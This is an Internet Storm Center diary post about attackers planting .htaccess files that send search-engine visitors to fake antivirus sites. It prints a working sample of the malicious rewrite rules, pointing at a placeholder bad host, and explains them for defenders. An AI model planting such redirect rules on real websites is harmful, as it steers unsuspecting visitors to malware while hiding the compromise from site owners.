SANS ISC: Watch that .htaccess file on your web site

• SANS Site Network
  • Current Site
  • SANS Internet Storm Center
  • Other SANS Sites Help
  • Graduate Degree Programs
  • Security Training
  • Security Certification
  • Security Awareness Training
  • Penetration Testing
  • Industrial Control Systems
  • Cyber Defense Foundations
  • DFIR
  • Software Security
  • Government OnSite Training

SANS ISC InfoSec Forums

The bad guys behind the Antivirus 2008/2009 malware have been recently using a pretty sneaky tactics for redirecting people to their fake web sites.
We actually received a report about this back at the beginning of September (so this has been in the wild for at least a month) by our reader John R, but somehow we missed to write a diary about it.

In this latest scheme of attacks, attackers are abusing the RewriteEngine feature in Apache web servers. This feature can be activated through the .htaccess access control file. This file is usually located in the top directory of a web server and in incidents that have been detected so far it appears that the file has been put with stolen FTP credentials.
One sample .htaccess file is shown below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
Errordocument 404 http://BAD_SITE/in.html?s=hg_err

Such a .htaccess file first enables the RewriteEngine and then defines 6 condition rules, followed by a RewriteRule. The condition rules check the referer header (%{HTTP_REFERER} and compare it with a regexp that follows. As you can see, the attackers are catching most common search engines. For those not familiar with the rewrite rules above: NC means no case (case insensitive), OR is just a logical OR with the next statement. If any condition matched, the RewriteRule statement is executed. In this sample, it redirected the browser to a bad site ([R,L] in the RewriteRule means force redirect, last rule).

As you can see, this is very sneaky – if you visit the compromised web site directly, everything will work as it's supposed to. However, if you search for something and the search engine shows you a link to the compromised web site, when you click on it you will be redirected to the bad site because your browser will send the referer header which will match one of the condition rules.

If you have a web site make sure that you are using strong credentials when you modify the contents and that you do that from a safe environment. If anyone from a web hosting company is reading this – check .htaccess files used on your web site (or better yet, disable them if you don't need them). Finally, make sure that you have proper security on the file level, so mass defacements like the one I described at http://isc.sans.org/diary.html?storyid=3078 can't happen.

--
Bojan